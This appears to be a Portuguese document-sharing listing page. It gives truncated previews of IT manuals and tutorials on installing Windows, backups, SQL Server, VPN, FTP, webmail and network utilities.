Como instalar Windows XP Como instalar Windows XP 1 Como instalar Windows XP Existem 2 opções para instalar XP: Opção A: para micro novo sem Sistema Operacional instalado (Exemplo de sistema operacional:windows 98, Windows 2000,

Leia mais

MANUAL DE CONFIGURAÇÃO DO BACKUP

MANUAL DE CONFIGURAÇÃO DO BACKUP SISTEMA DE AUTOMAÇÃO COMERCIAL MANUAL DE CONFIGURAÇÃO DO BACKUP Apresentação Após o término da instalação você deverá configurar o Backup para que você tenha sempre uma cópia de segurança dos seus dados

Leia mais

CONFIGURAÇÃO DE REDE SISTEMA IDEAGRI - FAQ CONCEITOS GERAIS

CONFIGURAÇÃO DE REDE SISTEMA IDEAGRI - FAQ CONCEITOS GERAIS CONFIGURAÇÃO DE REDE SISTEMA IDEAGRI - FAQ CONCEITOS GERAIS Servidor: O servidor é todo computador no qual um banco de dados ou um programa (aplicação) está instalado e será COMPARTILHADO para outros computadores,

Leia mais

UNIVERSIDADE FEDERAL DE GOIÁS CERCOMP (CENTRO DE RECURSOS COMPUTACIONAIS) TUTORIAL DE USO DO WEBMAIL - UFG

UNIVERSIDADE FEDERAL DE GOIÁS CERCOMP (CENTRO DE RECURSOS COMPUTACIONAIS) TUTORIAL DE USO DO WEBMAIL - UFG UNIVERSIDADE FEDERAL DE GOIÁS CERCOMP (CENTRO DE RECURSOS COMPUTACIONAIS) TUTORIAL DE USO DO WEBMAIL - UFG Página 1 de 26 Sumário Introdução...3 Layout do Webmail...4 Zimbra: Nível Intermediário...5 Fazer

Leia mais

Atualização Mandatória de Versão do Amadeus Pro Web (2.0P431BR) 25 de junho de 2007 Gerência de Produtos & Operações Amadeus Brasil

Atualização Mandatória de Versão do Amadeus Pro Web (2.0P431BR) 25 de junho de 2007 Gerência de Produtos & Operações Amadeus Brasil Atualização Mandatória de Versão do Amadeus Pro Web (2.0P431BR) 25 de junho de 2007 Amadeus Brasil Índice 1) O objetivo deste documento... 3 2) O que acontecerá quando chegar o dia da atualização de versão

Leia mais

Lazarus pelo SVN Linux/Windows

Lazarus pelo SVN Linux/Windows Lazarus pelo SVN Linux/Windows Sei que não faltam artigos sobre como obter e compilar o Lazarus e o FPC pelo SVN, mas sei também que nunca é de mais divulgar um pouco mais e talvez escrever algo diferente.

Leia mais

E&L Protocolo, Documentos Eletrônicos e Processos Perguntas Frequentes

E&L Protocolo, Documentos Eletrônicos e Processos Perguntas Frequentes E&L Protocolo, Documentos Eletrônicos e Processos Perguntas Frequentes 1. É possível excluir um processo que já foi enviado? Só será possível excluir o processo se o mesmo ainda não tiver sido recebido.

Leia mais

MANUAL PORTAL CLIENTE AVANÇO

MANUAL PORTAL CLIENTE AVANÇO MANUAL PORTAL CLIENTE AVANÇO [Digite seu endereço] [Digite seu telefone] [Digite seu endereço de email] MANUAL MANUAL AVANÇO INFORMÁTICA AVANÇO INFORMÁTICA Material Desenvolvido para Suporte Avanço Autor:

Leia mais

Atualizaça o do Maker

Atualizaça o do Maker Atualizaça o do Maker Prezados Clientes, Nós da Playlist Software Solutions empresa líder de mercado no desenvolvimento de software para automação de rádios - primamos pela qualidade de nossos produtos,

Leia mais

Na tela dele, clique no sinal de + ao lado do nome do seu computador, para expandi-lo. A seguir, expanda também o item "Sites da web".

Na tela dele, clique no sinal de + ao lado do nome do seu computador, para expandi-lo. A seguir, expanda também o item Sites da web. Servidor WEB Desenvolvedores de sites que querem aprender ou testar ASP, ou mesmo profissionais que precisam desenvolver páginas ASP ou ASP.Net, não precisam necessariamente ter um servidor na web com

Leia mais

Revisão: Introdução. - Integração com o AutoManager; 1 Atualização de versão do banco de dados PostgreSQL

Revisão: Introdução. - Integração com o AutoManager; 1 Atualização de versão do banco de dados PostgreSQL Urano Indústria de Balanças e Equipamentos Eletrônicos Ltda. Rua Irmão Pedro 709 Vila Rosa Canoas RS Fone: (51) 3462.8700 Fax: (51) 3477.4441 Características do Software Urano Integra 2.2 Data: 12/05/2014

Leia mais

Inserindo Dados no Banco de Dados Paradox.

Inserindo Dados no Banco de Dados Paradox. Inserindo Dados no Banco de Dados Paradox. - Construção do Banco de Dados: Para podermos inserir algo em um banco precisaremos de um Banco de Dados, para isto iremos montar um utilizando o Programa Database

Leia mais

Segurança de Acesso a Banco de Dados no MS SQL Server

Segurança de Acesso a Banco de Dados no MS SQL Server Segurança de Acesso a Banco de Dados no MS SQL Server Para efetuar com sucesso os exemplos que serão mostrados a seguir é necessário que exista no SQL Server uma pessoa que se conecte como Administrador,

Leia mais

Guia Rápido de Instalação Ilustrado

Guia Rápido de Instalação Ilustrado Livre S.O. Guia Rápido de Instalação Ilustrado Introdução Este guia tem como objetivo auxiliar o futuro usuário do Livre S.O. durante o processo de instalação. Todo procedimento é automatizado sendo necessárias

Leia mais

Como configurar e-mails nos celulares. Ebook. Como configurar e-mails no seu celular. W3alpha - Desenvolvimento e hospedagem na internet

Como configurar e-mails nos celulares. Ebook. Como configurar e-mails no seu celular. W3alpha - Desenvolvimento e hospedagem na internet Ebook Como configurar e-mails no seu celular Este e-book irá mostrar como configurar e-mails, no seu celular. Sistemas operacionais: Android, Apple, BlackBerry, Nokia e Windows Phone Há muitos modelos

Leia mais

Objetivo. Este documento tem como objetivo demonstrar o conceito, o processo de instalação e o funcionamento do SITEF (Tef dedicado).

Objetivo. Este documento tem como objetivo demonstrar o conceito, o processo de instalação e o funcionamento do SITEF (Tef dedicado). Sitef - Instalação Objetivo Este documento tem como objetivo demonstrar o conceito, o processo de instalação e o funcionamento do SITEF (Tef dedicado). O que é Sitef? O SiTef (ou tef dedicado) é um conjunto

Leia mais

GUIA MUDANÇA E FORMATAÇÃO DE SERVIDOR - SLIM

GUIA MUDANÇA E FORMATAÇÃO DE SERVIDOR - SLIM GUIA MUDANÇA E FORMATAÇÃO DE SERVIDOR - SLIM ÍNDICE ITEM Página 1. Objetivo... 3 2. Requisitos... 3 3. Diretório do Slim... 3 4. Procedimento para Transferência de Servidor... 3 4.1 Compartilhamento da

Leia mais

BACKUP ONLINE LINHA OFFICE

BACKUP ONLINE LINHA OFFICE BACKUP ONLINE LINHA OFFICE Índice 1. INFORMAÇÕES INICIAIS... 03 2. REQUISITOS PARA FUNCIONAMENTO... 03 2.1. CONFIGURAÇÕES DE REDE... 03 2.2 INSTALAÇÃO DOTNET... 03 3. ROTINA DE CONFIGURAÇÃO DO BACKUP ONLINE...

Leia mais

Apostilas OBJETIVA Escrevente Técnico Judiciário TJ Tribunal de Justiça do Estado de São Paulo - Concurso Público 2015. Caderno 1.

Apostilas OBJETIVA Escrevente Técnico Judiciário TJ Tribunal de Justiça do Estado de São Paulo - Concurso Público 2015. Caderno 1. Caderno 1 Índice MS-Windows 7: conceito de pastas, diretórios, arquivos e atalhos, área de trabalho, área de transferência, manipulação de arquivos e pastas, uso dos menus, programas e aplicativos, interação

Leia mais

Operações de Caixa. Versão 2.0. Manual destinado à implantadores, técnicos do suporte e usuários finais

Operações de Caixa. Versão 2.0. Manual destinado à implantadores, técnicos do suporte e usuários finais Operações de Caixa Versão 2.0 Manual destinado à implantadores, técnicos do suporte e usuários finais Sumário Introdução... 3 Suprimento... 3 Sangria... 4 Abertura de Caixa... 6 Fechamento de Caixa...

Leia mais

Como instalar o Ocomon passo a passo.

Como instalar o Ocomon passo a passo. Como instalar o Ocomon( Ferramenta Help Desk) passo a passo. Pessoal tudo bem? Já uso esta ferramenta há muito tempo e acho fantástica, quero compartilhar com vocês, pois ela é uma boa para quem quer gerenciar

Leia mais

Display de 7. PdP. Autor: Tiago Lone Nível: Básico Criação: 16/12/2005 Última versão: 18/12/2006. Pesquisa e Desenvolvimento de Produtos

Display de 7. PdP. Autor: Tiago Lone Nível: Básico Criação: 16/12/2005 Última versão: 18/12/2006. Pesquisa e Desenvolvimento de Produtos TUTORIAL Display de 7 Segmentos Autor: Tiago Lone Nível: Básico Criação: 16/12/2005 Última versão: 18/12/2006 PdP Pesquisa e Desenvolvimento de Produtos http://www.maxwellbohr.com.br contato@maxwellbohr.com.br

Leia mais

OneDrive: saiba como usar a nuvem da Microsoft

OneDrive: saiba como usar a nuvem da Microsoft OneDrive: saiba como usar a nuvem da Microsoft O OneDrive é um serviço de armazenamento na nuvem da Microsoft que oferece a opção de guardar até 7 GB de arquivos grátis na rede. Ou seja, o usuário pode

Leia mais

Professor: Macêdo Firmino Disciplina: Redes de Computadores II

Professor: Macêdo Firmino Disciplina: Redes de Computadores II Professor: Macêdo Firmino Disciplina: Redes de Computadores II Em um computador baseado no Windows, você pode compartilhar arquivos entre usuários remotos (outro computador). Os usuários remotos se conectam

Leia mais

Manual de Instalação de SQL Server (2005, 2008, 2012).

Manual de Instalação de SQL Server (2005, 2008, 2012). Manual de Instalação de SQL Server (2005, 2008, 2012). Instalação do SQL 2005. - Primeiro baixo o instalador do SQL nesse link: http://www.microsoft.com/pt-br/download/details.aspx?id=184 - Execute o arquivo

Leia mais

TUTORIAL VMWARE WORKSTATION 8. Aprenda a instalar e configurar corretamente uma máquina virtual utilizando VMware Workstation com este tutorial

TUTORIAL VMWARE WORKSTATION 8. Aprenda a instalar e configurar corretamente uma máquina virtual utilizando VMware Workstation com este tutorial TUTORIAL VMWARE WORKSTATION 8 Aprenda a instalar e configurar corretamente uma máquina virtual utilizando VMware Workstation com este tutorial INTRODUÇÃO O uso de máquinas virtuais pode ser adequado tanto

Leia mais

MANUAL DE FTP. Instalando, Configurando e Utilizando FTP

MANUAL DE FTP. Instalando, Configurando e Utilizando FTP MANUAL DE FTP Instalando, Configurando e Utilizando FTP Este manual destina-se auxiliar os clientes e fornecedores da Log&Print na instalação, configuração e utilização de FTP O que é FTP? E o que é um

Leia mais

Configurando o DDNS Management System

Configurando o DDNS Management System Configurando o DDNS Management System Solução 1: Com o desenvolvimento de sistemas de vigilância, cada vez mais usuários querem usar a conexão ADSL para realizar vigilância de vídeo através da rede. Porém

Leia mais

CRIANDO BANCOS DE DADOS NO SQL SERVER 2008 R2 COM O SQL SERVER MANAGEMENT STUDIO

CRIANDO BANCOS DE DADOS NO SQL SERVER 2008 R2 COM O SQL SERVER MANAGEMENT STUDIO CRIANDO BANCOS DE DADOS NO SQL SERVER 2008 R2 COM O SQL SERVER MANAGEMENT STUDIO Antes de criarmos um novo Banco de Dados quero fazer um pequeno parênteses sobre segurança. Você deve ter notado que sempre

Leia mais

IMPORTANTE: O PNM4R2 não entra em estado funcional enquanto o Windows não

IMPORTANTE: O PNM4R2 não entra em estado funcional enquanto o Windows não Manual Instalação Positivo Network Manager Versão 4R2 para Integradores O produto Positivo Network Manager Versão 4R2 (PNM4R2) consiste de uma plataforma do tipo cliente servidor, sendo o cliente, os microcomputadores

Leia mais

Simulador ITIL Exame de Certificação da EXIM

Simulador ITIL Exame de Certificação da EXIM Simulador ITIL Exame de Certificação da EXIM WWW.ASASSOFTWARES.COM.BR Índice 1 Informações Básicas... 1 1.1 Sair da aplicação... 1 1.2 Testar aplicação... 1 1.3 Licenciando a aplicação... 1 1.4 Aceitar

Leia mais

Conheça os principais comandos do Prompt do Windows; veja lista

Conheça os principais comandos do Prompt do Windows; veja lista Conheça os principais comandos do Prompt do Windows; veja lista Embora nem todos conheçam, o Prompt do Windows possui comandos interessantes e que podem ser úteis em algumas situações e até mesmo mais

Leia mais

CAPA Área de utilização para ilustração MANUAL w-vpn

CAPA Área de utilização para ilustração MANUAL w-vpn ...6 CAPA Área de utilização para ilustração MANUAL w-vpn 20/01/2012 Versão 1.4 Sumário 1.0 Pré Requisitos de instalação do w-vpn...2 2.0 Instalação do Serviço...2 3.0 Dicas...8 4.0 Suporte...11 1 1.0

Leia mais

Aula prática. Objetivo IPCONFIG. Prof. Leandro Pykosz Leandro@sulbbs.com.br. Informa a configuração atual de rede da máquina;

Aula prática. Objetivo IPCONFIG. Prof. Leandro Pykosz Leandro@sulbbs.com.br. Informa a configuração atual de rede da máquina; Aula prática Prof. Leandro Pykosz Leandro@sulbbs.com.br Objetivo Nesta aula, você aprenderá a utilizar alguns utilitários de rede que podem ajudá-lo a identificar problemas na rede. No windows existem

Leia mais

SIPREV/Gestão de RPPS Implantação Manual de Instalação Versão 1.18

SIPREV/Gestão de RPPS Implantação Manual de Instalação Versão 1.18 Implantação Manual de Instalação Versão 1.18 1 de 44 - Manual de Instalação Histórico de Revisões Data Versão Descrição Autor 19/05/09 1.0 Criação do documento Carlos Tabosa-UDCE 22/05/09 1.1 Revisão do

Leia mais

Manual de operação. BS Ponto Versão 5.1

Manual de operação. BS Ponto Versão 5.1 Manual de operação BS Ponto Versão 5.1 conteúdo 1. Instalação do sistema Instalando o BS Ponto Configurando o BS Ponto 2. Cadastrando usuários Cadastro do usuário Master Alterando a senha Master Cadastro

Leia mais

USANDO O ROUNDCUBE WEBMAIL

USANDO O ROUNDCUBE WEBMAIL USANDO O ROUNDCUBE WEBMAIL ATENÇÃO! Para utilizar este tutorial não se esqueça: Onde estiver escrito seusite.com.br substitua pelo ENDEREÇO do seu site (domínio). Ex.: Se o endereço do seu site é casadecarnessilva.net

Leia mais

COMO INSTALAR O CATÁLOGO

COMO INSTALAR O CATÁLOGO Este guia tem por finalidade detalhar as etapas de instalação do catálogo e assume que o arquivo de instalação já foi baixado de nosso site. Caso não tenho sido feita a etapa anterior favor consultar o

Leia mais

Manual de configuração do sistema

Manual de configuração do sistema Manual de configuração do sistema (v.1.5.x Beta) Rua México, 119 Sala 2004 Centro Rio de Janeiro, RJ www.doctors-solution.com.br www.simdoctor.com.br contato@simdoctor.com.br Sumário 1. Fazendo seu primeiro

Leia mais

GUIA RÁPIDO. DARUMA Viva de um novo jeito

GUIA RÁPIDO. DARUMA Viva de um novo jeito GUIA RÁPIDO DARUMA Viva de um novo jeito Dicas e Soluções para IPA210 Leia atentamente as dicas a seguir para configurar seu IPA210. Siga todos os tópicos para que seja feita a configuração básica para

Leia mais

Instalação e utilização do Document Distributor

Instalação e utilização do Document Distributor Para ver ou fazer o download desta ou de outras publicações do Lexmark Document Solutions, clique aqui. Instalação e utilização do Document Distributor O Lexmark Document Distributor é composto por pacotes

Leia mais

Procedimentos Operacionais Ambiente Microsoft Windows 2000 Server Máquina Smart02 ADM

Procedimentos Operacionais Ambiente Microsoft Windows 2000 Server Máquina Smart02 ADM Procedimentos Operacionais Ambiente Microsoft Windows 2000 Server Máquina Smart02 ADM Destinada para GSSOF A máquina Smart02 destina-se ao ambiente de produção do projeto SmartCard e garante a comunicação

Leia mais

O sistema está pedindo que eu faça meu login novamente e diz que minha sessão expirou. O que isso significa?

O sistema está pedindo que eu faça meu login novamente e diz que minha sessão expirou. O que isso significa? Que tipo de navegadores são suportados? Preciso permitir 'cookies' O que são 'cookies' da sessão? O sistema está pedindo que eu faça meu login novamente e diz que minha sessão expirou. O que isso significa?

Leia mais

MANUAL CFTV DIGITAL - LINHA LIGHT 16 CANAIS 120 FPS / VID 120-LI CONFIGURAÇÃO DO COMPUTADOR 16 Canais - 120 FPS Processador Dual Core 2.0GHZ ou superior; Placa Mãe Intel ou Gigabyte com chipset Intel;

Leia mais

SISTEMA DE PRODUTOS E SERVIÇOS CERTIFICADOS. MÓDULO DO CERTIFICADOR MANUAL DE OPERAÇÃO Versão 2.4.6

SISTEMA DE PRODUTOS E SERVIÇOS CERTIFICADOS. MÓDULO DO CERTIFICADOR MANUAL DE OPERAÇÃO Versão 2.4.6 SISTEMA DE PRODUTOS E SERVIÇOS CERTIFICADOS Versão 2.4.6 Sumário Fluxograma básico do processo de envio de remessa... 5 Criar novo certificado... 6 Aprovar certificado... 16 Preparar e enviar remessa...

Leia mais

Como atualizar os preços da ABCFarma.

Como atualizar os preços da ABCFarma. Como atualizar os preços da ABCFarma. Requisitos 1. Ter o Microsoft Office 2003 instalado. Pode ser qualquer outra versão, mas eu vou explicar com a 2003, se você utilizar outra versão, saiba como utilizá-la.

Leia mais

Guia para atualização de Firmware dos consoles CL5, CL3 e CL1. (Firmware 1.51)

Guia para atualização de Firmware dos consoles CL5, CL3 e CL1. (Firmware 1.51) Guia para atualização de Firmware dos consoles CL5, CL3 e CL1 (Firmware 1.51) Yamaha Musical do Brasil www.yamaha.com.br PRECAUÇÕES 1. O usuário assume total responsabilidade pela atualização. 2. Atualize

Leia mais

O Protocolo SMTP. Configuração de servidor SMTP

O Protocolo SMTP. Configuração de servidor SMTP O Protocolo SMTP (Simple Mail Transfer Protocol, que se pode traduzir por Protocolo Simples de Transferência de Correio) é o protocolo standard que permite transferir o correio de um servidor a outro em

Leia mais

Página 1 MANUAL DE UTILIZAÇÃO DA FERRAMENTA OFFICE ONLINE WORD ONLINE EXCEL ONLINE POWER POINT ONLINE

Página 1 MANUAL DE UTILIZAÇÃO DA FERRAMENTA OFFICE ONLINE WORD ONLINE EXCEL ONLINE POWER POINT ONLINE Página 1 MANUAL DE UTILIZAÇÃO DA FERRAMENTA OFFICE ONLINE WORD ONLINE EXCEL ONLINE POWER POINT ONLINE Página 2 Sumário Como começar usar?... 03 Iniciando o uso do OneDrive.... 04 Carregar ou Enviar os

Leia mais

GUIA RÁPIDO SISTEMA ANTIFURTO THEFT DETERRENT

GUIA RÁPIDO SISTEMA ANTIFURTO THEFT DETERRENT GUIA RÁPIDO SISTEMA ANTIFURTO THEFT DETERRENT SUMÁRIO Prefácio... 1 A quem se destina... 1 Nomenclatura utilizada neste documento... 1 Tela de login... 2 Tela Inicial... 4 Gestão de Dispositivo Acompanhar

Leia mais

IP significa Internet Protocol. A Internet é uma rede, e assim como ocorre em qualquer tipo de rede, os seus nós (computadores, impressoras, etc.

IP significa Internet Protocol. A Internet é uma rede, e assim como ocorre em qualquer tipo de rede, os seus nós (computadores, impressoras, etc. Endereços IP Endereços IP IP significa Internet Protocol. A Internet é uma rede, e assim como ocorre em qualquer tipo de rede, os seus nós (computadores, impressoras, etc.) precisam ter endereços. Graças

Leia mais

Data Transformation Services (DTS) por Anderson Ferreira Souza

Data Transformation Services (DTS) por Anderson Ferreira Souza Data Transformation Services (DTS) por Anderson Ferreira Souza O Sql Server possui um recurso extremamente poderoso que é muito pouco utilizado pelos administradores e programadores. Com certeza, sendo

Leia mais

Considerações a serem feitas antes da implantação.

Considerações a serem feitas antes da implantação. Multi-Loja Objetivo O objetivo deste documento é demonstrar o conceito de Multi-loja utilizando o Sismoura. É uma ferramenta que permite a comunicação entre as empresas, possibilitando assim que a matriz

Leia mais

Manual de Instalação da VPN

Manual de Instalação da VPN Manual de Instalação da VPN Windows Vista e Windows 7 Sumário: Manual de instalação da VPN 1. OBJETIVO... 3 2. EFETUANDO O DOWNLOAD DO INSTALADOR DA VPN... 3 3. INSTALANDO A VPN... 6 4. CONFIGURANDO A

Leia mais